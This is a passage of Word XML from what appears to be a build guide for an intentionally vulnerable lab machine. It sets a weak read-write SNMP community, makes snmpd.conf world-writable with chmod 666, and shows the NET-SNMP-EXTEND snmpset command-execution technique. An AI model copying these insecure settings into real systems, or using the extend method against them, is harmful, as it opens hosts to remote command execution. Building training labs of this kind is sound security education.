          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000221">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   interface on the default SNMP port (161).  This allows you to</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000222">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   specify which address, interface, transport type and port(s) that you</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   want the agent to listen on.  Multiple definitions of this token</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000224">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   are concatenated together (using ':'s).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000225">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   arguments: [transport:]port[@interface/address],...</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000226">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># agentaddress  127.0.0.1,[::1]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000227">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000228">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">agentaddress</w:t>
              <w:tab/>
              <w:t xml:space="preserve">udp:161,udp6:[::1]:161</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000229">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 7</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table36"/>
        <w:tblW w:w="826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65"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8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Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># rocommunity: a SNMPv1/SNMPv2c read-only access community name</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#   arguments:  community [default|hostname|network/bits] [oid | -V view]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Read-only access to everyone to the systemonly view</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="0000ff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">rocommunity  $eCur!ty$tr1ng default -V systemonly</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">rocommunity6 $eCur!ty$tr1ng default -V systemonly</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000230">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">rwcommunity insecureString</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000231">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table37"/>
        <w:tblW w:w="826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1785"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2160"/>
            <w:gridCol w:w="2160"/>
            <w:gridCol w:w="2160"/>
            <w:gridCol w:w="1785"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="4"/>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snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c &lt;rw_string&gt; &lt;local_ip_addr&gt; 'nsExtendStatus."testcommand"' = createAndGo 'nsExtendCommand."testcommand"' = /bin/echo 'nsExtendArgs."testcommand"' = 'hello world'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table38"/>
        <w:tblW w:w="82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1770"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2160"/>
            <w:gridCol w:w="2160"/>
            <w:gridCol w:w="2160"/>
            <w:gridCol w:w="1770"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="4"/>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sudo chmod </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:color w:val="e69138"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">666</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> /etc/snmp/snmpd.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7 / 7:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table39"/>
        <w:tblW w:w="819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10"/>
        <w:gridCol w:w="1725"/>
        <w:gridCol w:w="2430"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1725"/>
            <w:gridCol w:w="2310"/>
            <w:gridCol w:w="1725"/>
            <w:gridCol w:w="2430"/>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color w:val="ff0000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">-rw-rw-rw- </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Source Code Pro" w:cs="Source Code Pro" w:eastAsia="Source Code Pro" w:hAnsi="Source Code Pro"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  1 root root 3134 Sep 29 01:47 snmpd.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000240">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_czhtzrnq1yjh" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000241">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24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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nrae7na0y47g" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Source Code Disclosure via OSINT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000244">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_je8d2fgcr3xt" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="4572000" cy="439271"/>
            <wp:effectExtent b="9525" l="9525" r="9525" t="9525"/>
            <wp:docPr id="23"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572000" cy="439271"/>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5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000246">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fouagxuzakel" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="3657600" cy="2364059"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="15" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="31320" l="0" r="3298" t="2033"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="23640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7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t3ymvdu1igu1" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="3657600" cy="508496"/>
            <wp:effectExtent b="9525" l="9525" r="9525" t="9525"/>
            <wp:docPr id="45" name="image33.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
